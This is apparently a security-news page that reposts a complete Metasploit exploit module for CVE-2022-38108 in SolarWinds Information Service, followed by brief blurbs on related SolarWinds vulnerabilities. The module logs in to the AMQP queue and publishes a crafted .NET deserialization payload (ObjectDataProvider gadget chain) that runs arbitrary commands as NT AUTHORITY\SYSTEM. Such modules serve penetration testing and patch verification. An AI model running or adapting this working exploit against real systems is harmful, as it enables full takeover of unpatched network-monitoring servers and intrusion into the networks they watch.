Security
Headlines
HeadlinesLatestCVEs

Headline

SolarWinds Information Service (SWIS) Remote Command Execution

The SolarWinds Information Service (SWIS) is vulnerable to remote code execution by way of a crafted message received through the AMQP message queue. A malicious user that can authenticate to the AMQP service can publish such a crafted message whose body is a serialized .NET object which can lead to OS command execution as NT AUTHORITY\SYSTEM.

Packet Storm
#vulnerability#windows#js#git#rce#auth#ssl
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'rex/proto/amqp/version_0_9_1'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  def initialize    super(      'Name' => 'SolarWinds Information Service (SWIS) .NET Deserialization From AMQP RCE',      'Description' => %q{        The SolarWinds Information Service (SWIS) is vulnerable to RCE by way of a crafted message received through the        AMQP message queue. A malicious user that can authenticate to the AMQP service can publish such a crafted        message whose body is a serialized .NET object which can lead to OS command execution as NT AUTHORITY\SYSTEM.      },      'Author' => [        'Justin Hong', # vulnerability research, Trend Micro        'Lucas Miller', # vulnerability research, Trend Micro        'Piotr Bazydło', # vulnerability discovery, reported to ZDI        'Spencer McIntyre' # metasploit module      ],      'Arch' => ARCH_CMD,      'Platform' => 'win',      'References' => [        [ 'CVE', '2022-38108' ],        [ 'URL', 'https://www.zerodayinitiative.com/blog/2023/2/27/cve-2022-38108-rce-in-solarwinds-network-performance-monitor' ],        [ 'URL', 'https://www.solarwinds.com/trust-center/security-advisories/cve-2022-38108' ]      ],      'DefaultOptions' => {        'WfsDelay' => 10      },      'Targets' => [        [ 'Automatic', {} ]      ],      'DefaultTarget' => 0,      'Privileged' => true,      'DisclosureDate' => '2022-10-19',      'Notes' => {        'Stability' => [CRASH_SAFE],        'Reliability' => [REPEATABLE_SESSION],        'SideEffects' => [IOC_IN_LOGS]      }    )    register_options([      Opt::RHOST,      Opt::RPORT(5671),      OptString.new('USERNAME', [true, 'The username to authenticate with', 'orion']),      OptString.new('PASSWORD', [true, 'The password to authenticate with', ''])    ])    register_advanced_options(      [        OptBool.new('SSL', [ true, 'Negotiate SSL/TLS for outgoing connections', true ]),        Opt::SSLVersion      ]    )  end  def peer    rhost = datastore['RHOST']    rport = datastore['RPORT']    if Rex::Socket.is_ipv6?(rhost)      "[#{rhost}]:#{rport}"    else      "#{rhost}:#{rport}"    end  end  def print_status(msg)    msg = "#{peer} - #{msg}"    super  end  def exploit    amqp_client = Rex::Proto::Amqp::Version091::Client.new(      datastore['RHOST'],      port: datastore['RPORT'],      context: { 'Msf' => framework, 'MsfExploit' => self },      ssl: datastore['SSL'],      ssl_version: datastore['SSLVersion']    )    unless amqp_client.login(datastore['USERNAME'], datastore['PASSWORD'])      fail_with(Failure::NoAccess, "Authentication failed for user #{datastore['USERNAME']}.")    end    print_status('Successfully connected to the remote server.')    channel = amqp_client.channel_open    vprint_status('Successfully opened a new channel.')    channel.basic_publish(      routing_key: 'SwisPubSub',      message: ::Msf::Util::DotNetDeserialization.generate(        payload.encoded,        gadget_chain: :ObjectDataProvider,        formatter: :JsonNetFormatter      ),      properties: {        message_type: 'System.Windows.Data.ObjectDataProvider'      }    )    print_status('Successfully published the message to the channel.')    channel.close    amqp_client.connection_close  rescue Rex::Proto::Amqp::Error::UnexpectedReplyError => e    fail_with(Failure::UnexpectedReply, e.message)  rescue Rex::Proto::Amqp::Error::AmqpError => e    fail_with(Failure::Unknown, e.message)  ensure    amqp_client.close  endend

Related news

CVE-2022-36966: SolarWinds Platform 2022.4 Release Notes

Users with Node Management rights were able to view and edit all nodes due to Insufficient control on URL parameter causing insecure direct object reference (IDOR) vulnerability in SolarWinds Platform 2022.3 and previous.

CVE-2022-38108: Published | Zero Day Initiative

SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands.

Packet Storm: Latest News

Zeek 6.0.9